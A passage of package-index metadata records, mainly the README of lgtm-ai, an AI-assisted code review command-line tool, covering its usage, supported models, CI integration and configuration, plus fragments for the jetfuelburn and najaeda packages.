"Programming Language :: Python :: 3.13",
"Programming Language :: Python :: 3.14",
"Natural Language :: English",
"Operating System :: OS Independent",
"Topic :: Scientific/Engineering"
] | [] | null | null | >=3.11 | [] | [] | [] | [
"pint",
"pytest; extra == \"testing\"",
"pytest-cov; extra == \"testing\"",
"python-coveralls; extra == \"testing\""
] | [] | [] | [] | [
"source, https://github.com/sustainableaviation/jetfuelburn",
"homepage, https://jetfuelburn.readthedocs.io",
"tracker, https://github.com/sustainableaviation/jetfuelburn/issues"
] | twine/6.1.0 CPython/3.13.7 | 2026-02-20T09:18:02.304591 | jetfuelburn-2.0.1.tar.gz | 276,573 | be/1d/9fe96df184d3b96d619f60aaaed8b1d3be99a064e1672a69c7b51970fcf1/jetfuelburn-2.0.1.tar.gz | source | sdist | null | false | f3f49b22446b05bb5792b497b09f0581 | fca56b1dd419751c1b23c403cf2413e81788d85dd9b7f2c898c2d69baf75211e | be1d9fe96df184d3b96d619f60aaaed8b1d3be99a064e1672a69c7b51970fcf1 | null | [
"LICENSE.txt"
] | 211 |
2.4 | lgtm-ai | 1.5.2 | Your AI-powered code review companion |
<p align="center">
<img alt="lgtm-logo" width="150" src="https://raw.githubusercontent.com/elementsinteractive/lgtm-ai/main/assets/lgtm-large.png">
</p>
# lgtm-ai


[](https://github.com/astral-sh/ruff)
[](https://pypi.org/project/lgtm-ai/)
[](https://hub.docker.com/r/elementsinteractive/lgtm-ai)
[](https://github.com/marketplace/actions/lgtm-ai-code-review)
[](LICENSE)
---
lgtm-ai is your AI-powered code review companion. It generates code reviews using your favorite LLMs and helps human reviewers with detailed, context-aware reviewer guides. Supports GitHub, GitLab, and major AI models including GPT-4, Claude, Gemini, and more.
**Table of Contents**
- [Quick Usage](#quick-usage)
- [Review](#review)
- [Local Changes](#local-changes)
- [Reviewer Guide](#reviewer-guide)
- [Installation](#installation)
- [How it works](#how-it-works)
- [Review scores and comment categories](#review-scores-and-comment-categories)
- [Supported Code Repository Services](#supported-code-repository-services)
- [Using Issue/User Story Information](#using-issueuser-story-information)
- [Supported AI models](#supported-ai-models)
- [Summary](#summary)
- [OpenAI](#openai)
- [Google Gemini](#google-gemini)
- [Anthropic's Claude](#anthropics-claude)
- [Mistral AI](#mistral-ai)
- [DeepSeek](#deepseek)
- [Local models](#local-models)
- [CI/CD Integration](#cicd-integration)
- [Configuration](#configuration)
- [Main options](#main-options)
- [Review options](#review-options)
- [Issues Integration options](#issues-integration-options)
- [Example `lgtm.toml`](#example-lgtmtoml)
- [Contributing](#contributing)
- [Running the project](#running-the-project)
- [Managing requirements](#managing-requirements)
- [Commit messages](#commit-messages)
- [Contributors ✨](#contributors-)
## Quick Usage
### Review
```sh
lgtm review --ai-api-key $OPENAI_API_KEY \
--git-api-key $GITLAB_TOKEN \
--model gpt-5 \
--publish \
"https://gitlab.com/your-repo/-/merge-requests/42"
```
This will generate a **review** like this one:
<img src="https://raw.githubusercontent.com/elementsinteractive/lgtm-ai/main/assets/review.png" alt="lgtm-review" height="250"/>
<br/>
<img src="https://raw.githubusercontent.com/elementsinteractive/lgtm-ai/main/assets/review-comment.png" alt="lgtm-review-comment" height="250"/>
#### Local Changes
You can also review local changes without a pull request:
```sh
lgtm review --ai-api-key $OPENAI_API_KEY \
--model gpt-5 \
--compare main \
path/to/git/repo
```
### Reviewer Guide
```sh
lgtm guide --ai-api-key $OPENAI_API_KEY \
--git-api-key $GITLAB_TOKEN \
--model gpt-5 \
--publish \
"https://gitlab.com/your-repo/-/merge-requests/42"
```
This will generate a **reviewer guide** like this one:
<img src="https://raw.githubusercontent.com/elementsinteractive/lgtm-ai/main/assets/reviewer-guide.png" alt="lgtm-review-guide" height="250"/>
## Installation
```sh
pip install lgtm-ai
```
Or you can use the official Docker image:
```sh
docker pull elementsinteractive/lgtm-ai
```
## How it works
lgtm reads the given pull request and feeds it to several AI agents to generate a code review or a reviewer guide. The philosophy of lgtm is to keep the models out of the picture and totally configurable, so that you can choose which model to use based on pricing, security, data privacy, or whatever is important to you.
If instructed (with the option `--publish`), lgtm will publish the review or guide to the pull request page as comments.
### Review scores and comment categories
Reviews generated by lgtm will be assigned a **score**, using the following scale:
| Score | Description |
| ------ | --- |
| LGTM 👍 | The PR is generally ready to be merged. |
| Nitpicks 🤓 | There are some minor issues, but the PR is almost ready to be merged. |
| Needs Work 🔧 | There are some issues with the PR, and it is not ready to be merged. The approach is generally good, the fundamental structure is there, but there are some issues that need to be fixed. |
| Needs a Lot of Work 🚨 | Issues are major, overarching, and/or numerous. However, the approach taken is not necessarily wrong. |
| Abandon ❌ | The approach taken is wrong, and the author needs to start from scratch. The PR is not ready to be merged as is at all. |
For each review, lgtm may create several inline comments, pointing out specific issues within the PR. These comments belong to a **category** and have a **severity**. You can configure which categories you want lgtm to take a look at (see the [configuration section below](#configuration)). The available categories are:
| Category | Description |
| ------- | ----------- |
| Correctness 🎯 | Does the code behave as intended? Identifies logical errors, bugs, incorrect algorithms, broken functionality, or deviations from requirements. |
| Quality ✨ | Is the code clean, readable, and maintainable? Evaluates naming, structure, modularity, and adherence to clean code principles (e.g., SOLID, DRY, KISS). |
| Testing 🧪 | Are there sufficient and appropriate tests? Includes checking for meaningful test coverage, especially for edge cases and critical paths. Are tests isolated, reliable, and aligned with the behavior being verified? |
| Security 🔒 | Does the code follow secure programming practices? Looks for common vulnerabilities such as injection attacks, insecure data handling, improper access control, hardcoded credentials, or lack of input validation. |
There are three available severities for comments:
- LOW 🔵
- MEDIUM 🟡
- HIGH 🔴
### Supported Code Repository Services
lgtm aims to work with as many services as possible, and that includes remote repository providers. At the moment, lgtm supports:
- [GitLab](https://gitlab.com) (both gitlab.com and [self-managed](https://about.gitlab.com/install/)).
- [GitHub](https://github.com)
lgtm will autodetect the url of the pull request passed as an argument.
### Using Issue/User Story Information
lgtm-ai can enhance code reviews by including context from linked issues or user stories (e.g., GitHub/GitLab issues). This helps the AI understand the purpose and requirements of the PR.
**How to use:**
- Provide the following options to the `lgtm review` command:
- `--issues-url`: The base URL of the issues or user story page.
- `--issues-platform`: The platform for the issues (e.g., `github`, `gitlab`, `jira`).
- `--issues-regex`: (Optional) A regex pattern to extract the issue ID from the PR title or description.
- `--issues-api-key`: (Optional) API key for the issues platform (if different from `--git-api-key`).
- `--issues-user`: (Optional) Username for the issues platform (required if source is `jira`).
**Example:**
```sh
lgtm review \
--issues-url "https://github.com/your-org/your-repo/issues" \
--issues-platform github \
--issues-regex "(?:Fixes|Resolves) #(\d+)" \
--issues-api-key $GITHUB_TOKEN \
...
"https://github.com/your-org/your-repo/pull/42"
```
- These options can also be set in the `lgtm.toml` configuration file, see more in the [configuration section](#configuration).
- lgtm will automatically extract the issue ID from the PR metadata using the provided regex, fetch the issue content, and include it as additional context for the review.
**Notes:**
- GitHub, GitLab, and [JIRA cloud](https://developer.atlassian.com/cloud/jira/platform/) issues are supported.
- If `--issues-api-key` is not provided, lgtm will use `--git-api-key` for authentication.
- If no issue is found, the review will proceed without issue context.
- lgtm provides a default regex for extracting issue IDs that works with [conventional commits](https://www.conventionalcommits.org). This means you often do not need to specify `--issues-regex` if your PR titles or commit messages follow the conventional commit format (e.g., `feat(#123): add new feature`), or if your PR descriptions contain mentions to issues like: `refs: #123` or `closes: #123`.
### Supported AI models
lgtm supports several AI models so you can hook up your preferred LLM to perform reviews for you.
This is the full list of supported models:
#### Summary
| Provider | Example Models | API Key Setup |
|-------------|---------------------------------|-------------------------------------------------------------------------------|
| **OpenAI** | `gpt-5`, `gpt-4.1`, `gpt-4o-mini`, `o1-preview` | [Generate API key](https://platform.openai.com/api-keys) |
| **Google Gemini** | `gemini-2.5-pro`, `gemini-2.5-flash` | [Get API key](https://aistudio.google.com/apikey) |
| **Anthropic (Claude)** | `claude-opus-4-5`, `claude-sonnet-4-5`, `claude-haiku-4-5` | [Anthropic Console](https://console.anthropic.com/dashboard) |
| **Mistral** | `mistral-large-latest`, `mistral-small`, `codestral-latest` | [Mistral Platform](https://console.mistral.ai/api-keys) |
| **DeepSeek** | `deepseek-chat`, `deepseek-reasoner` | [DeepSeek Platform](https://platform.deepseek.com/usage) |
| **Local / Custom** | Any OpenAI-compatible model (e.g. `llama3`) | Run with `--model-url http://localhost:11434/v1` |
#### OpenAI
Check out the OpenAI platform page to see [all available models provided by OpenAI](https://platform.openai.com/docs/overview).
To use OpenAI LLMs, you need to provide lgtm with an API Key, which can be generated in the [OpenAI platform page for your project, or your user](https://platform.openai.com/api-keys).
<details>
<summary>Supported OpenAI models</summary>
These are the main supported models, though the CLI may support additional ones due to the use of [pydantic-ai](https://ai.pydantic.dev).
| Model name |
| -------- |
| gpt-5 |
| gpt-5-mini |
| gpt-4.1 |
| gpt-4.1-mini |
| gpt-4.1-nano |
| gpt-4o * |
| gpt-4o-mini |
| o4-mini |
| o3-mini |
| o3 |
| o1-preview |
| o1-mini |
| o1 |
| gpt-4-turbo |
| gpt-4 |
| gpt-3.5-turbo |
| chatgpt-4o-latest |
</details>
#### Google Gemini
Check out the [Gemini developer docs](https://ai.google.dev/gemini-api/docs/models) to see all models provided by Google.
To use Gemini LLMs, you need to provide lgtm an API Key, which can be generated [here](https://aistudio.google.com/apikey).
These are the main supported models, though the CLI may support additional ones due to the use of [pydantic-ai](https://ai.pydantic.dev). Gemini timestamps models, so be sure to always use the latest model of each family, if possible.
For Gemini models exclusively, you can provide a wildcard at the end of the model name and lgtm will attempt to select the latest model (e.g., `gemini-2.5-pro*`)
<details>
<summary>Supported Google's Gemini models</summary>
| Model name |
| ----------- |
| gemini-2.5-pro |
| gemini-2.5-pro-preview-06-05 |
| gemini-2.5-pro-preview-05-06 |
| gemini-2.5-flash |
| gemini-2.0-pro-exp-02-05 |
| gemini-1.5-pro |
| gemini-1.5-flash |
</details>
#### Anthropic's Claude
Check out [Anthropic documentation](https://docs.anthropic.com/en/docs/about-claude/models/all-models) to see which models they provide. lgtm works with a subset of Claude models. To use Anthropic LLMs, you need to provide lgtm with an API Key, which can be generated from the [Anthropic Console](https://console.anthropic.com/dashboard).
<details>
<summary>Supported Anthropic models</summary>
These are the main supported models, though the CLI may support additional ones due to the use of [pydantic-ai](https://ai.pydantic.dev).
| Model name |
| ---------------------------- |
| claude-opus-4-5 |
| claude-sonnet-4-5 |
| claude-haiku-4-5 |
| claude-opus-4-1-20250805 |
| claude-sonnet-4-0 |
| claude-3-7-sonnet-latest |
| claude-3-5-sonnet-latest |
| claude-3-5-haiku-latest |
| claude-3-opus-latest |
</details>
#### Mistral AI
Check out the [Mistral documentation](https://docs.mistral.ai/getting-started/models/models_overview/) to see all models provided by Mistral.
To use Mistral LLMs, you need to provide lgtm with an API Key, which can be generated from Mistral's [Le Platforme](https://console.mistral.ai/api-keys).
<details>
<summary>Supported Mistral AI models</summary>
These are the main supported models, though the CLI may support additional ones due to the use of [pydantic-ai](https://ai.pydantic.dev).
| Model name |
| ------------------ |
| mistral-large-latest |
| mistral-small |
| codestral-latest |
</details>
#### DeepSeek
Check out the [DeepSeek documentation](https://api-docs.deepseek.com/quick_start/pricing) to see all models provided by DeepSeek.
At the moment, lgtm only supports DeepSeek from `https://api.deepseek.com`: other providers and custom URLs are not supported. However, this is in our roadmap!
To get an API key for DeepSeek, create one at [DeepSeek Platform](https://platform.deepseek.com/usage).
<details>
<summary>Supported DeepSeek models</summary>
| Model name |
| ----------- |
| deepseek-chat |
| deepseek-reasoner |
</details>
#### Local models
You can run lgtm against a model available at a custom url (say, models running with [ollama](https://ollama.com) at http://localhost:11434/v1). These models need to be compatible with OpenAI. In that case, you need to pass the option `--model-url` (and you can choose to skip the option `--ai-api-token`). Check out the [pydantic-ai documentation](https://ai.pydantic.dev/models/openai/#openai-responses-api) to see more information about how lgtm interacts with these models.
```sh
lgtm review \
--model llama3.2 \
--model-url http://localhost:11434/v1 \
...
https://github.com/group/repo/pull/1
```
### CI/CD Integration
lgtm is meant to be integrated into your CI/CD pipeline, so that PR authors can choose to request reviews by running the necessary pipeline step.
For GitLab, you can use this .gitlab-ci.yml step as inspiration:
```yaml
lgtm-review:
image:
name: docker.io/elementsinteractive/lgtm-ai
entrypoint: [""]
stage: ai-review
needs: []
rules:
- if: $CI_MERGE_REQUEST_ID
when: manual
script:
- lgtm review --git-api-key ${LGTM_GIT_API_KEY} --ai-api-key ${LGTM_AI_API_KEY} -v ${MR_URL}
variables:
MR_URL: "${CI_PROJECT_URL}/-/merge_requests/${CI_MERGE_REQUEST_IID}"
```
For GitHub, you can use the official [LGTM AI GitHub Action](https://github.com/marketplace/actions/lgtm-ai-code-review):
```yaml
- name: AI Code Review
uses: elementsinteractive/lgtm-ai-action@v1.0.0
with:
ai-api-key: ${{ secrets.AI_API_KEY }}
git-api-key: ${{ secrets.GITHUB_TOKEN }}
model: 'gpt-5'
pr-number: ${{ github.event.issue.number }}
```
You can also check out this repo's [lgtm workflow](./.github/workflows/lgtm.yml) for a complete example with comment triggers (`/lgtm review`).
### Configuration
You can customize how lgtm works by passing cli arguments to it on invocation, or by using the *lgtm configuration file*.
You can configure lgtm through cli arguments, through environment variables, and through a configuration file. lgtm uses a `.toml` file to configure how it works. It will autodetect a `lgtm.toml` file in the current directory, or you can pass a specific file path with the CLI option `--config <path>`.
Alternatively, lgtm also supports [pyproject.toml](https://packaging.python.org/en/latest/guides/writing--toml/) files, you just need to nest the options inside `[tool.lgtm]`.
When it comes to preference for selecting options, lgtm follows this preference order:
`CLI options` > `lgtm.toml` > `pyproject.toml`
<details>
<summary>Summary of options</summary>
| Option | Feature Group | Optionality | Notes/Conditions |
|----------------------|----------------------|---------------------|---------------------------------------------------------------------------------|
| model | Main (review + guide) | 🟢 Optional | AI model to use. Defaults to `gemini-2.5-flash` if not set. |
| model_url | Main (review + guide) | 🟡 Conditionally required | Only needed for custom/local models. |
| exclude | Main (review + guide) | 🟢 Optional | File patterns to exclude from review. |
| publish | Main (review + guide) | 🟢 Optional | If true, posts review as comments. Default: false. |
| output_format | Main (review + guide) | 🟢 Optional | `pretty` (default), `json`, or `markdown`. |
| silent | Main (review + guide) | 🟢 Optional | Suppress terminal output. Default: false. |
| ai_retries | Main (review + guide) | 🟢 Optional | Number of retries for AI agent queries. Default: 1. |
| ai_input_tokens_limit| Main (review + guide) | 🟢 Optional | Max input tokens for LLM. Default: 500,000. Use `"no-limit"` to disable. |
| git_api_key | Main (review + guide) | 🟡 Conditionally required | API key for git service (GitHub/GitLab). Can't be given through config file. Also available through env variable `LGTM_GIT_API_KEY`. Required if reviewing a PR URL from a remote repository service (GitHub, GitLab, etc.). |
| ai_api_key | Main (review + guide) | 🔴 Required* | API key for AI model. Can't be given through config file. Also available through env variable `LGTM_AI_API_KEY`. |
| technologies | Review Only | 🟢 Optional | List of technologies for reviewer expertise. |
| categories | Review Only | 🟢 Optional | Review categories. Defaults to all (`Quality`, `Correctness`, `Testing`, `Security`). |
| additional_context | Review Only | 🟢 Optional | Extra context for the LLM (array of prompts/paths/URLs). Can't be given through the CLI |
| compare | Review Only | 🟢 Optional | If reviewing local changes, what to compare against (branch, commit, range, etc.). CLI only. |
| issues_url | Issues Integration | 🟢 Optional | Enables issue context. If set, `issues_platform` becomes required. |
| issues_platform | Issues Integration | 🟡 Conditionally required | Required if `issues_url` is set. |
| issues_regex | Issues Integration | 🟢 Optional | Regex for issue ID extraction. Defaults to conventional commit compatible regex. |
| issues_api_key | Issues Integration | 🟢 Optional | API key for issues platform (if different from `git_api_key`). Can't be given through config file. Also available through env variable `LGTM_ISSUES_API_KEY`. |
| issues_user | Issues Integration | 🟡 Conditionally required | Username for accessing issues information. Only required for `issues_platform=jira` |
</details>
#### Main options
These options apply to both reviews and guides generated by lgtm.
- **model**: Choose which AI model you want lgtm to use. If not set, defaults to `gemini-2.5-flash`.
- **model_url**: When not using one of the specific supported models from the providers mentioned above, you can pass a custom URL where the model is deployed (e.g., for local/hosted models).
- **exclude**: Instruct lgtm to ignore certain files. This is important to reduce noise in reviews, but also to reduce the amount of tokens used for each review (and to avoid running into token limits). You can specify file patterns (e.g., `exclude = ["*.md", "package-lock.json"]`).
- **publish**: If `true`, lgtm will post the review as comments on the PR page. Default is `false`.
- **output_format**: Format of the terminal output of lgtm. Can be `pretty` (default), `json`, or `markdown`.
- **silent**: Do not print the review in the terminal. Default is `false`.
- **ai_retries**: How many times to retry calls to the LLM when they do not succeed. By default, this is set to 1 (no retries at all).
- **ai_input_tokens_limit**: Set a limit on the input tokens sent to the LLM in total. Default is 500,000. To disable the limit, you can pass the string `"no-limit"`.
- **git_api_key**: API key to post the review in the source system of the PR. Can be given as a CLI argument, or as an environment variable (`LGTM_GIT_API_KEY`). You can omit this option if reviewing local changes.
- **ai_api_key**: API key to call the selected AI model. Can be given as a CLI argument, or as an environment variable (`LGTM_AI_API_KEY`).
#### Review options
These options are only used when performing reviews through the command `lgtm review`.
- **technologies**: Specify, as a list of free strings, which technologies lgtm specializes in. This can help direct the reviewer towards specific technologies. By default, lgtm won't assume any technology and will just review the PR considering itself an "expert" in it.
- **categories**: lgtm will, by default, evaluate several areas of the given PR (`Quality`, `Correctness`, `Testing`, and `Security`). You can choose any subset of these (e.g., if you are only interested in `Correctness`, you can configure `categories` so that lgtm does not evaluate the other missing areas).
- **additional_context**: TOML array of extra context to send to the LLM. It supports setting the context directly in the `context` field, passing a relative file path so that lgtm downloads it from the repository, or passing any URL from which to download the context. Each element of the array must contain `prompt`, and either `context` (directly injecting context) or `file_url` (for directing lgtm to download it from there).
- **compare**: When reviewing local changes (the positional argument to `lgtm` is a valid `git` path), you can choose what to compare against to generate a git diff. You can pass branch names, commits, etc. Default is `HEAD`. Only available as a CLI option.
#### Issues Integration options
See [Using Issue/User Story Information section](#using-issueuser-story-information).
- **issues_url**: The base URL of the issues or user story page to fetch additional context for the PR. If set, `issues_platform` becomes required.
- **issues_platform**: The platform for the issues (e.g., `github`, `gitlab`, `jira`). Required if `issues_url` is set.
- **issues_regex**: A regex pattern to extract the issue ID from the PR title or description. If omitted, lgtm uses a default regex compatible with conventional commits and common PR formats.
- **issues_api_key**: API key for the issues platform (if different from `git_api_key`). Can be given as a CLI argument, or as an environment variable (`LGTM_ISSUES_API_KEY`).
- **issues_user**: Username for accessing the issues platform (only necessary for `jira`). Can be given as a CLI argument, or as an environment variable (`LGTM_ISSUES_USER`).
#### Example `lgtm.toml`
```toml
technologies = ["Django", "Python"]
categories = ["Correctness", "Quality", "Testing", "Security"]
exclude = ["*.md"]
model = "gpt-4.1"
silent = false
publish = true
ai_retries = 1
ai_input_tokens_limit = 30000
[[additional_context]]
prompt = "These are the development guidelines for the team, ensure the PR follows them"
file_url = "https://my.domain.com/dev-guidelines.md"
[[additional_context]]
prompt = "CI pipeline for the repo. Do not report issues that this pipeline would otherwise catch"
file_url = ".github/workflows/pr.yml"
[[additional_context]]
prompt = "Consider these points when making your review"
context = '''
- We avoid using libraries and rely mostly on the stdlib.
- We follow the newest syntax available for Python (3.13).
'''
# Optional Issue/user story integration
issues_url = "https://github.com/your-org/your-repo/issues"
issues_platform = "github"
# The options below are optional even if the two above are provided
issues_regex = "(?:Fixes|Resolves) #(\d+)"
issues_api_key = "${GITHUB_TOKEN}"
```
## Contributing
### Running the project
This project uses [`just`](https://github.com/casey/just) recipes to do all the basic operations (testing the package, formatting the code, etc.).
Installation:
```sh
brew install just
# or
snap install --edge --classic just
```
It requires [poetry](https://python-poetry.org/docs/#installation).
These are the available commands for the justfile:
```
Available recipes:
help # Shows list of recipes.
venv # Generate the virtual environment.
clean # Cleans all artifacts generated while running this project, including the virtualenv.
test *test-args='' # Runs the tests with the specified arguments (any path or pytest argument).
t *test-args='' # alias for `test`
test-all # Runs all tests including coverage report.
format # Format all code in the project.
lint # Lint all code in the project.
pre-commit *precommit-args # Runs pre-commit with the given arguments (defaults to install).
spellcheck *codespell-args # Spellchecks your markdown files.
lint-commit # Lints commit messages according to conventional commit rules.
```
To run the tests of this package, simply run:
```sh
# All tests
just t
# A single test
just t tests/test_dummy.py
# Pass arguments to pytest like this
just t -k test_dummy -vv
```
### Managing requirements
`poetry` is the tool we use for managing requirements in this project. The generated virtual environment is kept within the directory of the project (in a directory named `.venv`), thanks to the option `POETRY_VIRTUALENVS_IN_PROJECT=1`. Refer to the [poetry documentation](https://python-poetry.org/docs/cli/) to see the list of available commands.
As a short summary:
- Add a dependency:
poetry add foo-bar
- Remove a dependency:
poetry remove foo-bar
- Update a dependency (within constraints set in `pyproject.toml`):
poetry update foo-bar
- Update the lockfile with the contents of `pyproject.toml` (for instance, when getting a conflict after a rebase):
poetry lock
- Check if `pyproject.toml` is in sync with `poetry.lock`:
poetry lock --check
### Commit messages
In this project we enforce [conventional commits](https://www.conventionalcommits.org) guidelines for commit messages. The usage of [commitizen](https://commitizen-tools.github.io/commitizen/) is recommended, but not required. Story numbers (JIRA, etc.) must go in the scope section of the commit message. Example message:
```
feat(#<issue-number>): add new feature x
```
Merge requests must be approved before they can be merged to the `main` branch, and all the steps in the `ci` pipeline must pass.
This project includes an optional pre-commit configuration. Note that all necessary checks are always executed in the ci pipeline, but
configuring pre-commit to execute some of them can be beneficial to reduce late errors. To do so, simply execute the following just recipe:
```sh
just pre-commit
```
Feel free to create [GitHub Issues](https://github.com/elementsinteractive/lgtm-ai/issues) for any feature request, bug, or suggestion!
## Contributors ✨
Thanks goes to these wonderful people ([emoji key](https://allcontributors.org/docs/en/emoji-key)):
<!-- ALL-CONTRIBUTORS-LIST:START - Do not remove or modify this section -->
<!-- prettier-ignore-start -->
<!-- markdownlint-disable -->
<table>
<tbody>
<tr>
<td align="center" valign="top" width="14.28%"><a href="https://github.com/scastlara"><img src="https://avatars.githubusercontent.com/u/7606872?v=4?s=50" width="50px;" alt="Sergio Castillo"/><br /><sub><b>Sergio Castillo</b></sub></a><br /><a href="https://github.com/elementsinteractive/lgtm-ai/commits?author=scastlara" title="Code">💻</a> <a href="#design-scastlara" title="Design">🎨</a> <a href="#ideas-scastlara" title="Ideas, Planning, & Feedback">🤔</a> <a href="#maintenance-scastlara" title="Maintenance">🚧</a></td>
<td align="center" valign="top" width="14.28%"><a href="https://github.com/jbozanowski"><img src="https://avatars.githubusercontent.com/u/114900?v=4?s=50" width="50px;" alt="Jakub Bożanowski"/><br /><sub><b>Jakub Bożanowski</b></sub></a><br /><a href="https://github.com/elementsinteractive/lgtm-ai/commits?author=jbozanowski" title="Code">💻</a> <a href="#ideas-jbozanowski" title="Ideas, Planning, & Feedback">🤔</a> <a href="#maintenance-jbozanowski" title="Maintenance">🚧</a></td>
<td align="center" valign="top" width="14.28%"><a href="https://github.com/sacha-c"><img src="https://avatars.githubusercontent.com/u/3247529?v=4?s=50" width="50px;" alt="Sacha Brouté"/><br /><sub><b>Sacha Brouté</b></sub></a><br /><a href="https://github.com/elementsinteractive/lgtm-ai/commits?author=sacha-c" title="Code">💻</a> <a href="#ideas-sacha-c" title="Ideas, Planning, & Feedback">🤔</a></td>
<td align="center" valign="top" width="14.28%"><a href="https://github.com/sdn4z"><img src="https://avatars.githubusercontent.com/u/13658011?v=4?s=50" width="50px;" alt="Daniel"/><br /><sub><b>Daniel</b></sub></a><br /><a href="#ideas-sdn4z" title="Ideas, Planning, & Feedback">🤔</a> <a href="https://github.com/elementsinteractive/lgtm-ai/commits?author=sdn4z" title="Code">💻</a></td>
<td align="center" valign="top" width="14.28%"><a href="https://github.com/Rooni"><img src="https://avatars.githubusercontent.com/u/916242?v=4?s=50" width="50px;" alt="Rooni"/><br /><sub><b>Rooni</b></sub></a><br /><a href="https://github.com/elementsinteractive/lgtm-ai/commits?author=Rooni" title="Code">💻</a></td>
<td align="center" valign="top" width="14.28%"><a href="https://www.jjshanks.net/"><img src="https://avatars.githubusercontent.com/u/62661?v=4?s=50" width="50px;" alt="Joshua Shanks"/><br /><sub><b>Joshua Shanks</b></sub></a><br /><a href="https://github.com/elementsinteractive/lgtm-ai/commits?author=jjshanks" title="Code">💻</a></td>
</tr>
</tbody>
</table>
<!-- markdownlint-restore -->
<!-- prettier-ignore-end -->
<!-- ALL-CONTRIBUTORS-LIST:END -->
This project follows the [all-contributors](https://github.com/all-contributors/all-contributors) specification. Contributions of any kind welcome!
| text/markdown | Sergio Castillo Lara | s.cast.lara@gmail.com | null | null | null | AI, code-review, linting, static-analysis, machine-learning, developer-tools, automation | [
"Development Status :: 5 - Production/Stable",
"Intended Audience :: Developers",
"Topic :: Software Development :: Quality Assurance",
"Topic :: Software Development :: Code Generators",
"Topic :: Utilities",
"Topic :: Scientific/Engineering :: Artificial Intelligence",
"License :: OSI Approved :: MIT License",
"Programming Language :: Python :: 3",
"Programming Language :: Python :: 3.12",
"Programming Language :: Python :: 3.13",
"Programming Language :: Python :: 3.14",
"Operating System :: OS Independent"
] | [] | null | null | <4,>=3.12 | [] | [] | [] | [
"click<9.0.0,>=8.1.7",
"fastmcp<3.0.0,>=2.12.4; extra == \"mcp\"",
"gitpython<4.0.0,>=3.1.45",
"httpx<0.29.0,>=0.28.1",
"jinja2<4.0.0,>=3.1.6",
"nest-asyncio<2.0.0,>=1.6.0; extra == \"mcp\"",
"pydantic<3.0.0,>=2.10.3",
"pydantic-ai-slim[anthropic,google,mistral,openai]<2.0.0,>=1.0.0",
"pydantic-settings<3.0.0,>=2.10.1",
"pygithub<3.0.0,>=2.6.1",
"python-gitlab<6.0.0,>=5.1.0",
"rich<14.0.0,>=13.9.4"
] | [] | [] | [] | [
"Changelog, https://github.com/elementsinteractive/lgtm-ai/releases",
"Documentation, https://github.com/elementsinteractive/lgtm-ai?tab=readme-ov-file#lgtm-ai",
"Homepage, https://github.com/elementsinteractive/lgtm-ai",
"Source, https://github.com/elementsinteractive/lgtm-ai",
"Tracker, https://github.com/elementsinteractive/lgtm-ai/issues"
] | twine/6.1.0 CPython/3.13.7 | 2026-02-20T09:17:59.046870 | lgtm_ai-1.5.2.tar.gz | 62,971 | 16/c3/95a6f09b4dccfbbd527fd297029ede6a72fcc9045b851195766f1f6350a8/lgtm_ai-1.5.2.tar.gz | source | sdist | null | false | 7af3bd7cdca42a9f3feb0bedc444b1bb | d560343ea24eec2ff089d389a70eb97528085b88889dbbf9f83d9907783502d9 | 16c395a6f09b4dccfbbd527fd297029ede6a72fcc9045b851195766f1f6350a8 | null | [
"LICENSE"
] | 214 |
2.2 | najaeda | 0.4.1 | Naja EDA Python package | najaeda Python Package
=======================
najaeda is a Python package that provides data structures and APIs for developing post-synthesis Electronic Design Automation (EDA) algorithms.
najaeda provides a powerful yet simple framework designed to help software
and hardware developers efficiently navigate and manipulate electronic
design automation (EDA) workflows.
With najaeda, you can:
* Explore Netlists with Ease:
* Navigate netlist hierarchy and connectivity effortlessly.
* Browse at multiple levels of detail:
* Bit-level or bus-level granularity.
* Instance-by-instance exploration or flattened views at the primitives level.
* Localized per-instance connections or comprehensive equipotential views.
* Perform ECO (Engineering Change Order) Transformations:
* Seamlessly apply and manage changes to your designs.
* Prototype EDA Ideas Quickly:
* Use an intuitive API to experiment with new EDA concepts and workflows.
* Develop Custom EDA Tools:
* Build fast, tailored tools for solving specific challenges without relying on costly, proprietary EDA software.
najaeda empowers developers to innovate, adapt, and accelerate their EDA
processes with minimal overhead.
najaeda is the Python counterpart of the `Naja C++ project <https://github.com/najaeda/naja>`_.
If you find this project useful, please consider `starring it on GitHub <https://github.com/najaeda/naja>`_ to show your support.
Feel free to reach out to us anytime at `contact@keplertech.io <mailto:contact@keplertech.io>`_.
Installation
------------
Install Naja EDA using pip:
.. code-block:: bash
pip install najaeda
Quick Start
-----------
To quickly explore what **najaeda** can do, launch the interactive tutorial notebook on Google Colab:
.. image:: https://colab.research.google.com/assets/colab-badge.svg
:target: https://colab.research.google.com/github/najaeda/najaeda-tutorials/blob/main/notebooks/01_getting_started.ipynb
:alt: Open in Colab
Documentation
-------------
Naja EDA online documentation is available `here <https://najaeda.readthedocs.io/en/latest/index.html>`_.
Examples
--------
A list of examples can be found in this
documentation `section <https://najaeda.readthedocs.io/en/latest/examples.html>`_.
Support
-------
If you encounter any issues or have questions, please report them on the
`Naja issue tracker <https://github.com/najaeda/naja/issues>`_.
You’re also welcome to join the discussion on Matrix:
.. image:: https://img.shields.io/badge/Matrix-Join%20Chat-success?logo=matrix
:target: https://matrix.to/#/#naja:fossi-chat.org
:alt: Join the Matrix chat
License
-------
This project is licensed under the Apache License 2.0. \
See the `LICENSE <https://github.com/najaeda/naja/blob/main/LICENSE>`_ file for details. | text/x-rst | null | Naja Authors <contact@keplertech.io> | null | null | Apache License 2.0 | null | [
"Development Status :: 4 - Beta",
"Intended Audience :: Developers",
"License :: OSI Approved :: Apache Software License",
"Operating System :: MacOS",
"Operating System :: POSIX :: Linux",
"Operating System :: Microsoft :: Windows",
"Programming Language :: Python :: 3.9",
"Programming Language :: Python :: 3.10",
"Programming Language :: Python :: 3.11",
"Programming Language :: Python :: 3.12",
"Programming Language :: Python :: 3.13",
"Programming Language :: Python :: 3.14",
"Topic :: Scientific/Engineering :: Electronic Design Automation (EDA)"
] | [] | null | null | >=3.8 | [] | [] | [] | [] | [] | [] | [] | [
"Homepage, https://github.com/najaeda/naja"
